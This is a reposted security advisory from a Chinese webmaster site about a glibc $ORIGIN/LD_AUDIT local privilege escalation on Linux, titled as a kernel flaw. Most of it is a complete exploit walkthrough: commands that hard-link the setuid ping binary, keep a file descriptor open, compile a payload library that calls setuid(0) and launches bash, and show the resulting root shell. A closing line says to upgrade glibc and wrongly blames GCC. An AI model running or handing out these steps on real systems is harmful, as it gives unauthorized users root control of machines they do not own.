linux 2.6内核本地提权

It is possible to exploit this flaw to execute arbitrary code as root.

Please note, this is a low impact vulnerability that is only of interest to security professionals and system administrators. End users do not need to be concerned.

Exploitation would look like the following.

# Create a directory in /tmp we can control.

  $ mkdir /tmp/exploit


  # Link to an suid binary, thus changing the definition of $ORIGIN.

  $ ln /bin/ping /tmp/exploit/target


  # Open a file descriptor to the target binary (note: some users are surprised

  # to learn exec can be used to manipulate the redirections of the current

  # shell if a command is not specified. This is what is happening below).

  $ exec 3< /tmp/exploit/target


  # This descriptor should now be accessible via /proc.

  $ ls -l /proc/$$/fd/3

  lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*


  # Remove the directory previously created

  $ rm -rf /tmp/exploit/


  # The /proc link should still exist, but now will be marked deleted.

  $ ls -l /proc/$$/fd/3

  lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)


  # Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().

  $ cat > payload.c

  void __attribute__((constructor)) init()

  {

   setuid(0);

   system("/bin/bash");

  }

  ^D

  $ gcc -w -fPIC -shared -o /tmp/exploit payload.c

  $ ls -l /tmp/exploit

  -rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*


  # Now force the link in /proc to load $ORIGIN via LD_AUDIT.

  $ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3

  sh-4.1# whoami

  root

  sh-4.1# id

  uid=0(root) gid=500(taviso)

漏洞解决方法(这是由GCC引发的一个漏洞):

升级:glibc

（编辑：滁州站长网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!